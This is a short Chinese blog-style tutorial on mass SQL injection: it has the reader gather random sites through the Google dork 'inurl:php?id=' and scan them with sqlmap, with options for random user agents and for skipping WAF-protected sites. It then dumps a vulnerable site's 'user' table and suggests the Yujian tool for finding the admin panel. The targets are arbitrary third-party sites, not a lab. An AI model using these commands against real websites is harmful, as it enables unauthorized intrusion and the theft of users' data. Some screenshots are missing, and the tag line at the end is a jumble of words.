时间:2021-07-01 10:21:17 帮助过:25人阅读
在Google上搜索inurl:php?id=
将搜集的url写到一个文件当中url.txt中
sqlmap -m url.txt --random-agent --thread=10 --timeout=5 --batch --retries=1 --identify-waf
-m指定url文件
--random-agent 使用随机代理
--thread=10 设置线程数为10
--timeout=5 连接超时5秒放弃
--batch 扫描过程中遇到选项时选择默认选项
--retries 连接失败尝试一次重连
--identify-waf 遇到waf的站点跳过
经过一段时间的扫描,扫描到一个存在sql注入漏洞的站点
扫描所有的表
针对其中的一个表user
扫描这个表
--dump 获取表内容
-T user指定表
获取到表的内容
找后台可以用御剑
sqlmap测试php实战
标签:use thread user 针对 9.png map 存在 bat dump